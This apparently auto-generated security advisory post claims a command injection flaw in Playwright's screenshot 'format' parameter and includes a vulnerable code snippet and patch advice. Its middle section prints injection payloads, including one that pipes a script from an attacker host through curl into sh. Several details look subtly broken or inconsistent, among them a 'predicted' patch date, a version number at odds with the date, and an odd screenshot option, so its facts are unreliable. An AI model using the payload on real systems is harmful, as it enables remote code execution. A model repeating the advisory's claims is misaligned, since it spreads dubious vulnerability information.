Listen to this Post
The vulnerability in Playwright’s screenshot function stems from improper neutralization of special elements used in an OS command. The `format` parameter, which typically accepts values like ‘jpeg’ or ‘png’, is directly interpolated into a shell command string. When an attacker supplies a malicious input string, such as ; whoami;, the library fails to sanitize or escape it. This unsanitized input is then concatenated into the command that is executed via the system shell. The shell interprets the semicolons as command separators, allowing the attacker’s payload to execute with the same privileges as the Node.js process, leading to a complete compromise of the server.
Platform: Node.js
Version: <1.15.2
Vulnerability: Command Injection
Severity: Critical
date: 2024-05-15
Prediction: Patch: 2024-05-22
What Undercode Say:
Identify if a system uses a vulnerable version of Playwright npm list playwright Simulate the vulnerable command construction echo "screenshot --format='\$MALICIOUS_INPUT'" Example of a malicious payload MALICIOUS_INPUT="'; curl http://attacker.com/exfiltrate.sh | sh; "
// Example vulnerable code snippet
const { chromium } = require('playwright');
(async () => {
const browser = await chromium.launch();
const page = await browser.newPage();
await page.goto('http://example.com');
// userInput is attacker-controlled
await page.screenshot({ path: 'example.png', format: userInput });
await browser.close();
})();
How Exploit:
Craft HTTP POST request with `format` parameter containing shell metacharacters and commands for remote code execution.
Protection from this CVE:
Upgrade to v1.15.2. Sanitize user input. Implement strict input whitelisting for the `format` parameter.
Impact:
Remote Code Execution, Full System Compromise, Data Breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
